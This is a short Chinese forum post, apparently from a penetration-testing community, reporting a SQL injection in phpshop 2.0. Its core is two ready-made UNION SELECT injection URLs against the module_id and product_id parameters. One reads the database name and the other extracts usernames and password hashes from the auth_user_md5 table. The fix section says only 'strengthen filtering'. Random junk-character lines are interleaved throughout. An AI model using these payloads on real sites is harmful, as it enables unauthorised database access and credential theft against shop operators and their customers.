中国网络渗透测试联盟
标题:
phpshop 2.0 SQL注入及修复
[打印本页]
作者:
admin
时间:
2013-1-18 18:24
标题:
phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
& w! ~7 p% f% m8 T
5 ?. |8 D" G; t! H
作者 : By onestree
* c7 j* l& |3 y, G- O
下载地址 :
http://code.google.com/p/phpshop/downloads/list
# V1 V# d( H0 D- Z/ K$ X
测试地址: windows 7 / ubuntu
3 i/ L! S+ X3 @5 F
; n Q; i0 `. J, \& W( z* K& A7 n
5 j1 o! V8 P- } E
SQLi p0c:
3 M' L1 q# u8 c0 A' [0 k
, \% e; b/ u# C5 ~/ E* g
==================
' C: F. N8 }6 e$ p; o
0 C* i/ p S& L6 Q: i" E
http://www.xxx.com
/phpshop 2.0/?page=admin/function_list&module_id=11'
/ Z2 q" s$ V( q; }, J3 p6 ^
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
2 U9 o3 e2 C/ W
2 x' a% w- n {2 |
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
, R1 ~9 ~" u& a4 b& U m
4 M! K. q1 y3 p" y Y7 l
修复:
" @1 g$ `$ H2 f
加强过滤
# h) ?/ M( m3 {. z3 R
F! e5 i/ U# u
$ q# _; Q2 k" y# l% `- p' k
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2